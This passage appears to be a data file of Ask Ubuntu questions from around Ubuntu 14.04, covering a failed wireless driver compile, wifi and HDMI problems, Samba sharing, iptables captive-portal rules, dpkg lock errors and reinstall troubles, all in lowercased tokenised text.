/home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:527:9 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_reg_dump4 '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:537:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` all_sta_info '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:555:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` best_channel '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:561:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_best_channel ; ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:564:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rx_signal '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:570:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_rx_signal ; ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:572:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ht_enable '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:578:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_ht_enable ; ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:580:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` cbw40_enable '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:586:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_cbw40_enable ; ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:588:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ampdu_enable '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:594:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_ampdu_enable ; ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:596:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rx_stbc '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:602:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_rx_stbc ; ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:605:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` path_rssi '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:608:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` vid '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:615:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` pid '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:622:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rssi_disp '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:628:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_rssi_disp ; ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:631:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` sreset '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:637:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_sreset ; ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c : at top level : /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:999:2 : warning : initialization from incompatible pointer type [ enabled by default ] .ndo_select_queue = rtw_select_queue , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:999:2 : warning : ( near initialization for ârtw_netdev_ops.ndo_select_queueâ ) [ enabled by default ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.o ] error 1 make [ 1 ] : *** [ _module_/home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-32-generic' make : *** [ modules ] error 2 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # compile make driver error : 2 please check error mesg # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # or is there a .deb package i can get somewhere ?
505971	when i login , i see `` you have mail . `` , but /var/mail/ < username > is empty	i have a ubuntu 14.04lts installed on vps . i have noticed that when i login i see greeting saying `` you have mail '' , but cat /var/mail/myusername returns empty string , i.e . the file is empty . i have configured postfix virtual mail boxes and dovecot , following this tutorial . may be i did something wrong that affects the system mails ? i hope somebody can help me . thanks in advance .
505972	problems with hdmi output resolution using xubuntu 14.04	i got a problem using xubuntu 14.04 lts while connecting it to the hdmi port from a samsung ln40r81 . straight to the point , the resolution is lower than the required ( 1366 x 768 ) . this resolution option does not appear . besides , there is no xorg.conf file to make changes . and i have arandr installed , by the way . my xrandr output on console goes like this : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 32767 x 32767 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 309mm x 174mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) 1656x900_60.00 59.9 hdmi1 connected 1280x720+0+0 ( normal left inverted right x axis y axis ) 160mm x 90mm 1280x720 60.0*+ 50.0 59.9 1920x1080i 60.1 50.0 60.0 720x576 50.0 720x480 60.0 59.9 640x480 60.0 59.9 dp1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) 1368x768_60.00 ( 0xf2 ) 85.9mhz h : width 1368 start 1440 end 1584 total 1800 skew 0 clock 47.7khz v : height 768 start 769 end 772 total 795 clock 60.0hz i just need to add the 1366x768 resolution , or at least the 1360x768 , on which will make least difference for its usage . greetings . edit trying volker siegel 's links , now appears this : x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 16 ( rrcreatemode ) serial number of failed request : 36 current serial number in output stream : 36 last edit ( temporary answer ) well , i checked a little more about my screen and found a temporary solution . why ? it only works using extended screen , not mirroring them . when i mirror them , i can not change both screen resolutions to the point i could observe 90 % of all screen content on both monitors . so now i am using extended screen mode , because i can change both resolutions apart . still , if somebody could help me to add screen resolutions to my xubuntu ( or explain me why i ca n't ) , it will be fully apreciated .
505973	two ubuntu machines can not access each other 's shares anymore	i have two ubuntu laptops , both running 14.04 `` trusty tahr '' . at one point , they were both able to access each other 's shared folders . however , something happened when i was trying to add a third ubuntu 14.04 machine into the mix , and now none of the computers can see each other on nautilis - > browse network ( or dolphin , for that matter ) . i have samba installed and updated on both machines . they 're all on the same wan , and they 're all configured to the `` pawshare '' workgroup . ( resetting to `` workgroup '' does not fix it . ) when i updated samba today , i went ahead and overwrote the old configuration files , just in case something borked , and reconfigured the workgroup . yet , i still see nothing . i 've browsed google for hours over the past few weeks , trying to solve this , and yet nothing works . at last check , i can ping one laptop from another successfully . i 'm at the end of my rope , now . help ? ( fyi : not a duplicate of `` unable to connect to samba share folders - desperation ahead . '' i do n't have a `` server/client '' setup , nor am i particular interested in doing so . i just want the regular computers to see each other 's shared folders . )
505979	gwenview on ubuntu keep crashing when i start viewing it on fullscreen or playing slideshow	i 'm currently using ubuntu unity 14.04 trusty tahr . are there any better alternatives for gwenview ?
505980	video-player does not work in ubuntu	i 'm a ubuntu newbie running 14.04 `` trusty tahr '' on a dell laptop . everything seems to work well so far , except for online movies , which do n't play at all . ( i do n't yet have any dvd discs of movies . ) i can only play youtube . no lcv or totem app appears . yet i did the command for lcv , and terminal seemed to accept it.the video icon linked to dashboard remains a stubborn black/grey picture of a film director 's clapboard . the only data beneath it reads `` stopped 00:00 '' . is there a simple ubuntu-compatible movie that i can test start , and how would i go about it ? i 'm willing to subscribe to a movies account . tartanchap
505985	old pc died , trying to boot to old drive on new pc	i searched for this problem , but came up short . what i have is my boot drive from a pc that fried in a lightning storm . trying to boot to it in a different machine , and i 'm unable to do so . i assume it 's a problem with drivers , but i 'm not skilled enough to know where to go from here . i 've booted to an xubuntu live disk i had laying around and successfully mounted said drive and can move around files , ect . any direction from here would be a great help . edit : attempting to boot to ubuntu 14.04 shows splash screen and orange blinking dots , then the screen goes black , and never proceeds from there . no errors , no indications that the hard drive is working , nothing . i would like to boot to that drive as is , if possible , so i can get my work . browsing the drive mounted seperately is not showing my user files as far as i can find .
505986	black screen in webcam	i do n't know why the webcam stopped , i have used yesterday and the webcam is working great . today i have turned on my laptop and when i have opened cheese the cam does n't work , the cam is on black screen . webcam : spca2082 pc camera laptop : aspire m5-481t-6195 os : eos how i can fix it ?
505988	ubuntu 12.04 ca n't install boot-repair ( no such file or directory )	trying to run boot-repair using try ubuntu on a 12.04 install cd . i 'm using the official documentation here : https : //help.ubuntu.com/community/boot-repair when i try the second line in terminal : sudo sed 's/trusty/saucy/g ' -i /etc/apt/sources.list.d/yannubuntu-boot-repair-trusty.list i get sed : ca n't read /etc/apt/sources.list.d/yannubuntu-boot-repair-trusty.list : no such file or directory how do i resolve this ?
505989	configure fingerprint-gui so that it does not ask for fingprint authentification on sudo	i find the dialog that pops up extremely annoying as i find it more convenient to type out the password . thanks
505990	how can i restore xubuntu without reinstalling	i installed ubuntu , and then , finding i still did n't like unity , a load of alternative desktops . they seem to be fighting a bit . the one i like best is xfce . is there a way to repair the installation to the state it would have been from a straight xubuntu installation , or is the best thing ( a lot of work ! ) to install from an xubuntu disk and then add all the packages and configuration that i need over again .
505992	how do i delete all iptables rules that match a filter ?	i 'm making a captive portal . the default ruleset is created as follows : # flush existing rules iptables -f iptables -x iptables -t nat -f iptables -t nat -x iptables -t mangle -f iptables -t mangle -x iptables -p input accept iptables -p forward accept iptables -p output accept # redirect all traffic to < captive > iptables -t mangle -n internet iptables -t mangle -a prerouting -p tcp -- dport 1:65535 -j internet iptables -t mangle -a internet -j mark -- set-mark 99 iptables -t nat -a prerouting -p tcp -m mark -- mark 99 -j dnat -- to-destination < captive > # redirect all [ allowed ] traffic to < internet > iptables -t nat -a postrouting -o < internet > -j masquerade 2 > & 1 when i allow an user to connect to < host > on port < port > , i issue this command : iptables -i internet 1 -t mangle -p tcp -d < host > -- dport < port > -m mac -- mac-source < mac > -j return however , i ca n't understand how to remove all rules for a given mac [ so that when they attempt to connect to < host > , they are redirected to < captive > ] . i know i could use iptables -d followed by the exact rule , but i wish to delete all such rules in a single command . is there any such thing ? i tried iptables -t mangle -m mac -- mac-source < mac > -f [ deletes all rules ] , iptables -d internet 1 -t mangle [ deletes the first rule , but it 's not safe because it might have been overwritten ] , and sudo iptables -t mangle -i internet 1 -m mac -- mac-source user-mac-address-here -j return , as suggested here , but iptables returns bad rule ( does a matching rule exist in that chain ? ) .
505994	wireless adapter not working	i just install ubuntu on my acer extensa 5420 computer . my computer does have wireless adpater but my computer does n't show any wireless connections.i have try ubuntu help and i could n't find anything there . can anybody help ? edit : pastebin wireless info here
505995	limit privileges for download folder	in windows , i was able to use the icacls utility to set files/folders with a lower integrity , in order to keep them from modifying higher-integrity locations . i 'd like to do something like that with ubuntu . specifically , i plan to download music torrents but , just in case , i 'd like to set things so that nothing can execute from the download folder . is there some way i could do that ? alternately , maybe i could run the torrent program and the download folder under a completely different user and section it off from the system ?
505996	on upgrade from 13 to 14 , wifi no longer works	i had ubuntu 13 and wifi worked great . i just upgraded to 14.04 . the wifi no longer works . wired networking works great . i have put the output of wireless_script in http : //pastebin.ubuntu.com/7935765 . in particular i noticed this . ftpmaint @ millstone : ~/tmp/wifi $ rfkill list 0 : dell-wifi : wireless lan soft blocked : no hard blocked : yes 1 : phy0 : wireless lan soft blocked : no hard blocked : yes ftpmaint @ millstone : ~/tmp/wifi $ maybe i misunderstand this entirely , but i certainly did not open the box and disable anything . it is a dell latitude e6330 ( it was listed as `` precertified '' for 12.04 so i thought that would likely mminimize incompatibiliteis ) , with intel 82579lm gigabit network connection . i 'd be very grateful for any help . jim
505998	how do i use wireless notebooks with ubuntu server 14.04 ?	i have just set up a proliant g4 server with ubuntu 14.04 . it seems to be working fine . i am using a lafalink lf-d10 wireless usb card . how do i use this as a home wireless server with windows notebook computers ? i am not picking up the server as a wireless device on my laptop so how do i make it work ? i am wanting to use it as a private server to host websites at home and for testing and programming .
506000	how to install nanozip in ubuntu 14.04 ?	i need to decompress an archive and i need this application . how do i install it ?
506003	how can i edit my gtk themes ?	i am pretty new with ubuntu . i am using ubuntu 14.04 . i am interested in changing my themes and also change other interfaces such as inkscape and gimp and other software that i am using . what is the best way of doing so ? p.s . i have done my research and ~/.themes/ does n't mean anything to me if i do n't know how to put it in the terminal .
506005	is there a file explorer for ubuntu with a windows style interface ?	i 'm fairly new to linux and just want to be able to see the disk usage and mounted drives in the same way that i can when i open 'my computer ' in windows . is there a file explorer for ubuntu with this kind of interface ?
506008	laptop battery not detected [ shuts down when disconnected from charger ]	i recently installed ubuntu 14.04 lts on my laptop and was able to get everything working , but my battery suddenly stopped working . i thought it just was n't charged , but even after charging it overnight the laptop shuts down after unplugging the charger . it appears the battery is detected ( it shows up in the power statistics and such in the settings ) , but says it 's charging . sidenote : the battery indicator has also disappeared from the menu bar . i checked the setting and i have it set to `` show when battery is present . '' not sure if this means anything .
506017	rest ( other than root ) of partition is not showing	i 've just installed ubuntu 14.04 for the first time after google few pages . everything is working pretty well except below problem . i 've already installed various updates . problem : i 've 500 gb hard disk . i assigned 40gb to root , i.e . `` / '' and 4gb to swap , but i 'm not able to see rest of the hard disk . please help . while installing , i was having complete 500gb hard disk . i did as per below . root 40 gb swap 4 gb ( equals to ram ) am i missing something ?
506019	how to get rid off the skype error `` skype ca n't connect . '' on ubuntu 12.04 lts ?	i 'm using ubuntu 12.04 lts on my machine since long . i installed `` skype 4.2 for linux '' . it was working fine till yesterday night . but today when i tried to log-in to skype i 'm not able to do it . an error message `` skype ca n't connect . '' is displaying when i press sign in button after filling the skype name and password . i 'm damn sure about the skype name and password i 'm entering are correct . i tried with the same credentials on a machine running on windows 7 . i was able to log-in over there . to resolve this issue i tried almost everything , from removing skype completely to install skype again and again from 'ubuntu software center ' , 'by downloading latest skype .deb file and running it on my machine ' , 'disabled the firewall ' , etc . but every time the result is same . for your information i 'm also attaching the screen shot of the error message to this question . so can some one help me in this regard please ? thanks in advance .
506021	ca n't connect to the wifi	i have ubuntu 14.04 and when i want to connect to the wifi my network manager found nothing and when i use this command sudo iwlist wlan0 scan it can find my essid wifi and when i use this command to connect sudo iwconfig wlan0 essid `` sample '' nothing happen and i ca n't connect neither my ifconfig command show this eth0 link encap : ethernet hwaddr b8:88 : e3:0e:03:49 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1576 errors:0 dropped:0 overruns:0 frame:0 tx packets:1576 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:131573 ( 131.5 kb ) tx bytes:131573 ( 131.5 kb ) wlan0 link encap : ethernet hwaddr 08 : ed : b9 : fa:1f:3b inet6 addr : fe80 : :aed : b9ff : fefa:1f3b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:29 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 my wifi device is broadcome : 03:00.0 network controller : broadcom corporation bcm43228 802.11a/b/g/n this is the text file of that script for my wifi information text file contain my wireless info what should i do to connect to the wifi ? ?
506022	getting error when uninstalling google chrome	i ca n't update or uninstall google chrome . i am getting this error : setting up google-chrome-stable ( 36.0.1985.125-1 ) ... xdg-icon-resource : size argument must be numeric try 'xdg-icon-resource -- help ' for more information . dpkg : error processing package google-chrome-stable ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : google-chrome-stable e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i remember changing and replacing default icons of google chrome before . how do i solve this ?
506024	powerbroker domain profile identical to local profile so no folder created	i log into my ubuntu 14.04 as my local user `` dan '' . i just used powerbroker to join it to my domain , but it does n't create a new profile when i log in as my domain user , which also happens to be `` dan '' , because the folder dan already exists . i removed the part where the login assumes the default domain ( sudo /opt/pbis/bin/config assumedefaultdomain true ) so i 'm forced to log in as domain\dan -- thinking it would create a folder in my home directory as domain.dan or domain\dan -- similar to how windoze does it , but it still logs into my local/original user `` dan '' even if i log in as domain\dan . i renamed my existing /home/dan to dan-old , and i can now log in as my domain user , so i am wondering how to make it so powerbroker creates a special kind of `` domain '' folder in my home directory . i believe when i set it up , i used the following command `` sudo /opt/pbis/bin/config homedirtemplate % h/ % u '' to create the home folders . can i add another variable so it appends something to the home folder so i can differentiate between a local user and domain user ? maybe % h/ % u- % domain ( where % domain is my netbios domain name -- of course , that variable is just made up ) . if there is an easier way to do this i would appreciate anyone 's know-how . i will be adding many ubuntu 12.04 and ubuntu 14.04 computers to the domain , and currently they all log in with usernames that match their windows active directory domain name so i 'd rather do it right the first time .
506025	in 14.04 , how do i persist a view in nautilus-gnome ?	i just upgraded from 12.04 to 14.04 and i use the gnome ( metacity ) ui . i set up a view in nautilus like this , including the side bar and location entry box . i want to persist this view so that whenever i open nautilus it will look like this . but each time i close and re-open nautilus it reverts to my default view : the settings that are available in location options- > preferences persist but those set in other menus , such as view options- > show sidebar do not . how can i set things up so that nautilus always opens with my preferred view ( first screen shot ) . i think this worked in 12.04 , but perhaps not ?
506026	change skype text alignment when language changes	i know skype for linux is n't the same as skype for windows . in windows , if i change the language to hebrew , it changes the text alignment to `` right to left '' as it should and it 's all fine . i recently installed skype on ubuntu , version 4.3 ( the latest ) , and i discovered the linux version does n't have hebrew on the list of languages . so i tried using skypeinyourlanguage and added arabic to skype ( also right to left ) , but it 's still aligned left to right . so how can i change the text alignment in skype ?
506027	dropbox wont install/remove and update manager is now not working	sorry to be so useless , this seems to be a common problem , but after trying to install dropbox on a fresh install of 12.04 i 'm getting all sorts of errors when trying to install/update anything , all loosely looking like this : sudo apt-get update [ sudo ] password for tim : e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? i understand that this is due to trying to install a program two ways , bit unsure how or when i did that but it would be nice to resolve . i 've read all sorts about removing the dpkg file but there does seem to be some risk attached to this . is there a better work around ? there does n't seem to be anything left in processes that relates to any updates , is there a way to stop one , or both , install processes to allow the other to finish properly ? at the moment i 'm not able to install anything new ( including a fresh 12.04 ) so it 's causing all sorts of problems . apologies again for any lack of important information . i 've tried various solutions provided by the 'duplicate question ' which seemed very similar to my problem . here are the two issues that do n't seem to have been resolved . when trying to remove the locked files i get this error : sudo apt-get update [ sudo ] password for tim : e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? sudo rm -f /var/lib/dpkg/lock sudo rm -f /var/cache/apt/archives/lock sudo rm -f /var/lib/apt/lists rm : can not remove `/var/lib/apt/lists ' : is a directory sudo apt-get update e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . dpkg -- configure just tries to install dropbox again but fails . when i try to kill the dropbox process through terminal ( does n't show/ca n't find in system monitor ) i get this error : ps aux | grep 2405 root 2405 68.3 1.6 39980 33788 pts/0 rn+ 10:26 10:29 /usr/bin/python /usr/bin/dropbox update tim 13202 0.0 0.0 4392 796 pts/2 s+ 10:41 0:00 grep 2405 kill -9 2405 bash : kill : ( 2405 ) - operation not permitted so i ca n't seem to be able to remove the files or close the process . i 'm probably missing something very obvious , but any help is appreciated .
506028	bluetooth dun service not available -- ubuntu problem or not ?	i 've been having tethering problems to several devices , but this is one specific example on linux ubuntu 3.2.0-67-generic # 101-ubuntu smp tue jul 15 17:45:51 utc 2014 i686 i686 i386 gnu/linux . i 've been trying to tether over bluetooth to a acatel ot-871a phone . according to the specifications it supports 2.1 bt profiles : a2dp , dun , opp/ftp , hsp sdptool browse < mac-address > reveals ( no dun or ftp service ) : service name : voiceg ateway `` handsfree audio gateway '' ( 0x111f ) `` generic audio '' ( 0x1203 ) service name : serial port0 `` serial port '' ( 0x1101 ) service name : advanced audio `` audio source '' ( 0x110a ) service rechandle : 0x10004 `` av remote target '' ( 0x110c ) service rechandle : 0x10005 `` av remote '' ( 0x110e ) service name : audio gateway `` headset audio gateway '' ( 0x1112 ) `` generic audio '' ( 0x1203 ) service name : obex object push `` obex object push '' ( 0x1105 ) service name : phonebook access pse `` phonebook access - pse '' ( 0x112f ) i 've had this problem with other devices that claim to offer dun support but i ca n't seem to find the services . is this a problem with the ubuntu drivers ? what else could i try ? as a side note , i have two 2.0 bt devices which both work for dun and ftp etc on this same computer .
506031	ubuntu installation media	i have a an hp laptop running win 8.1 that now boots to a black screen , not responding to any keyboard or mouse events . no idea what the problem is and i have n't got a boot device that can help me . how can i obtain an installation media with ubuntu that i can use to scratch the laptop and convert it to an ubuntu laptop ? any help appreciated .
506035	re-installing 14.04 lst - impossible	i did an on-line `` live upgrade '' from ubuntu 13.10 to 14.04 lst . unfortunately , this resulted in several broken dependencies in some of the programs i use on a daily basis ( i am not going to go into the details here.. ) . so , i thought that the most convenient way to fix things would be to do a fresh 14.04 lst installation on my laptop . when launching the 14.04 lst installer at boot time ( from a usb stick ) , it tells me that `` this computer has no detected os '' .. ! is the problem related to the fact that i am trying to install 14.04 lst on top of 14.04 lst , or to the fact that i am using lvm ( see below ) . when choosing the option `` do something else '' , instead of installing 14.04 and `` erasing the disk '' , i face a weird looking partition table which i am not used to .. it has a device mapper related to the logical volume manager ( lvm ) and it is impossible to set sensible mount points ( `` / '' , `` /home '' , etc . ) using the ubuntu installer . so i am stuck . the partition table of my current 14.04 installation looks like this : sampsa @ sampsa-xps-13 : ~ $ sudo fdisk -l disk /dev/sda : 512.1 gb , 512110190592 bytes 255 heads , 63 sectors/track , 62260 cylinders , total 1000215216 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0006a9fa device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 1000214527 499856385 5 extended /dev/sda5 501760 1000214527 499856384 8e linux lvm disk /dev/mapper/ubuntu -- vg-root : 503.7 gb , 503723327488 bytes 255 heads , 63 sectors/track , 61240 cylinders , total 983834624 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-root does n't contain a valid partition table disk /dev/mapper/ubuntu -- vg-swap_1 : 8128 mb , 8128561152 bytes 255 heads , 63 sectors/track , 988 cylinders , total 15876096 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-swap_1 does n't contain a valid partition table sampsa @ sampsa-xps-13 : ~ $ sudo df -h filesystem size used avail use % mounted on /dev/mapper/ubuntu -- vg-root 462g 129g 310g 30 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 3.7g 4.0k 3.7g 1 % /dev tmpfs 755m 1.3m 754m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.7g 360k 3.7g 1 % /run/shm none 100m 20k 100m 1 % /run/user /dev/sda1 236m 193m 31m 87 % /boot sampsa @ sampsa-xps-13 : ~ $ how should i proceed with the ( re- ) installation ? screenshots from the installation here .
506042	is there a way to install gnome 3.12 in ubuntu 14.04 without destroying unity ?	for theme development purposes , i 'd like to have both gnome 3.12 and unity installed at the same time , and without the inconvenience of a virtual machine/dual boot . i know that the project neon ppa for kde 5 installs in it 's own folder in /opt so as not to mess with existing kde installations , and installing trinity does the same . is there any way to install gnome 3.12 so that all of it 's files are in it 's own folder in /opt , or a different install setup so that unity wo n't be destroyed ? thanks for any input .
506043	how do i remove a user from the dpkg-statoverride file ?	tried to install a package after deleting some servers i no longer needed , and removing the deleted software package 's users and groups . went to fetch and install a new package , and got the following error . user @ localhost~ $ sudo apt-get install any-package ... package installation output omitted for brevity ... dpkg : unrecoverable fatal error , aborting : syntax error : unknown user 'puppet ' in statoverride file e : sub-process /usr/bin/dpkg returned an error code ( 2 ) so /usr/bin/dpkg-statoverride has an option to remove a path , but the binary throws the same error when i try to run it out side of the whole apt-get install context . so then i just added the user puppet , and i can download packages again , but i 'm trying to remove any extraneous elements from my dev system , so as far as i 'm concerned , this is n't a solution just because it works . as far as i can tell , the statoverride tells the package manager to install certain stuff to a certain path , and messes with the setuid flag , so potentially , it could be opening up a bunch of security holes by installing programs co-owned by an unused user and group . is there a reason dpkg-statoverride is n't updated with the rest of the system when a user is removed ? and is there a way to circumvent this so that i do n't have to : adduser - > install - > deluser : everytime i want to install a package ?
